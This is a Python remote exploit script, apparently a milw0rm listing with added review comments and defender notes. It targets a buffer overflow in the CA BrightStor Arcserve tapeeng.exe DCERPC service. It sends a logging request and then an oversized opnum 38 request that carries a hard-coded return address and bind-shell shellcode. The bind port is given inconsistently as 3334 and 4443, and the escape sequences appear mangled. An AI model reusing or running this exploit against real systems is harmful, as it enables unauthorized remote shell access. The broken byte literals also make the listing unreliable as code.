#!/usr/bin/python
# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
#
# Winny M Thomas
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import sys
def EnableDetailLogging(target):
    """Ask the tapeeng RPC service on *target* to enable detailed logging.

    Connects to TCP port 6502, binds to the tapeeng DCERPC interface
    (UUID 62b93df0-8b02-11ce-876c-00805f842837, version 1.0) and issues
    opnum 43 with a small fixed request body.  The script treats this as a
    prerequisite for the overflow request sent by DCEconnectAndExploit; why
    the overflow depends on the logging state is not explained here.

    Exits the process with status -1 if the TCP connect fails.

    Defender notes:
      * No credentials are set on the transport before the bind, so the
        interface appears to accept unauthenticated binds from any client
        that can reach port 6502 -- TODO confirm against vendor docs.
      * An unexpected TCP session to 6502 followed by a bind to this UUID is
        the observable worth alerting on; opnum 43 by itself is a benign
        configuration call.
    """
    trans = transport.TCPTransport(target, 6502)
    #On some linux systems the following call to connect may fail due to
    #no support of settimeout in socket module. Comment out that line in
    #transport.py of impacket and run this script
    try:
        trans.connect()
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit and discards the real error; `except Exception as e`
        # with the message printed would be more useful for diagnosis.
        print 'Could not connect to target port; Target may not be running tapeeng'
        sys.exit(-1)
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
    #RPC request to enable detail logging
    # NOTE(review): the escape sequences in this listing appear to have lost
    # their backslashes (compare the usage string in __main__), so these
    # literals are plain ASCII as shown.
    request = 'x00x04x08x0c'
    request += 'x02x00x00x00'
    request += 'x00x00x00x00'
    request += 'x00x00x00x00'
    request += 'x00x00x00x00'
    # Opnum 43 on the bound interface; the return value is not checked.
    dce.call(43, request)
def DCEconnectAndExploit(target):
    """Send the oversized opnum 38 request that triggers the overflow.

    Opens a fresh connection to port 6502 and re-binds to the same tapeeng
    interface used by EnableDetailLogging, then calls opnum 38 with a
    request built from a 4-byte prefix, 1130 bytes of filler, a short NOP
    sled with a jump, a hard-coded address described as "call ebx" in
    kernel32.dll, a further 32 NOPs and a bind-shell payload.

    Unlike EnableDetailLogging there is no try/except around connect(), so a
    refused connection raises out of this function instead of exiting with
    a message.

    Defender notes:
      * The trigger is a single DCERPC request to opnum 38 of interface
        62b93df0-8b02-11ce-876c-00805f842837 whose argument is far larger
        than any legitimate call (well over 1 KB here).  A request to that
        opnum with an argument of roughly that size is a reasonable
        detection signature, and filtering TCP/6502 at the perimeter removes
        the exposure until the vendor fix is applied.
      * The return address is a fixed kernel32 address, which is presumably
        why the header limits the claim to "tested on Windows 2000 SP4"; on
        other builds the service would most likely just crash, so an
        unexplained tapeeng.exe crash is itself an indicator worth
        investigating.
      * The comment on the payload says it binds to port 3334 while the
        file header and the final message in __main__ say 4443; which one
        is correct cannot be determined from this listing.
    """
    trans = transport.TCPTransport(target, 6502)
    trans.connect()  # no error handling here, unlike EnableDetailLogging
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
    # 4-byte prefix followed by the filler that overruns the target buffer.
    request = 'x10x09xf9x77'
    request += 'x41'*1130
    request += 'x90x90x90x90xebx08' #short jump into nops
    request += 'xd2x7bx57x7c' #call ebx address from kernel32.dll
    request += 'x90' * 32
    #Shellcode to bind shell to TCP port 3334
    # NOTE(review): 3334 here conflicts with the 4443 stated in the header
    # and in __main__.
    request += "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
    request += "x13xe9x59x23xcex83xebxfcxe2xf4x15x33xc8x83"
    request += "x01xa0xdcx31x16x39xa8xa2xcdx7dxa8x8bxd5xd2"
    request += "x5fxcbx91x58xccx45xa6x41xa8x91xc9x58xc8x87"
    request += "x62x6dxa8xcfx07x68xe3x57x45xddxe3xbaxeex98"
    request += "xe9xc3xe8x9bxc8x3axd2x0dx07xe6x9cxbcxa8x91"
    request += "xcdx58xc8xa8x62x55x68x45xb6x45x22x25xeax75"
    request += "xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
    request += "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57"
    request += "xcfx9ex16x8fx45x9dx8fx31x10xfcx81x2ex50xfc"
    request += "xb6x0dxdcx1ex81x92xcex32xd2x09xdcx18xb6xd0"
    request += "xc6xa8x68xb4x2bxccxbcx33x21x31x39x31xfaxc7"
    request += "x1cxf4x74x31x3fx0ax70x9dxbax0ax60x9dxaax0a"
    request += "xdcx1ex8fx31x32x95x8fx0axaax2fx7cx31x87xd4"
    request += "x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6x4dxf4"
    request += "x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
    request += "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9f"
    request += "x5ax99x16x8fx76x31x39x3fx49xaax8fx31x40xa3"
    request += "x60xbcx49x9exb0x70xefx47x0ex33x67x47x0bx68"
    request += "xe3x3dx43xa7x61xe3x17x1bx0fx5dx64x23x1bx65"
    request += "x42xf2x4bxbcx17xeax35x31x9cx1dxdcx18xb2x0e"
    request += "x71x9fxb8x08x49xcfxb8x08x76x9fx16x89x4bx63"
    request += "x30x5cxedx9dx16x8fx49x31x16x6exdcx1ex62x0e"
    request += "xdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
    request += "xbaxa6xf5x31x39x59x23xce"
    # Opnum 38 is the vulnerable operation; the call result is not checked.
    dce.call(38, request)
if __name__ == '__main__':
    # Single positional argument: the target host.  A missing argument
    # prints usage and exits with -1.  (The trailing 'n' in the usage string
    # is presumably a stripped '\n' escape; the listing's escapes look
    # mangled throughout.)
    try:
        target = sys.argv[1]
    except IndexError:
        print 'Usage: %s <target ip>n' % sys.argv[0]
        sys.exit(-1)
    # Step 1: opnum 43 (enable detail logging).  Step 2: opnum 38 overflow.
    EnableDetailLogging(target)
    DCEconnectAndExploit(target)
    # NOTE(review): success is reported unconditionally -- neither dce.call
    # result is checked, so this message says nothing about whether the
    # request actually had an effect.  The port stated here (4443) also
    # conflicts with the 3334 given in the shellcode comment.
    print 'Exploit complete; Now telnet to port 4443 on target'
# milw0rm.com [2007-01-05]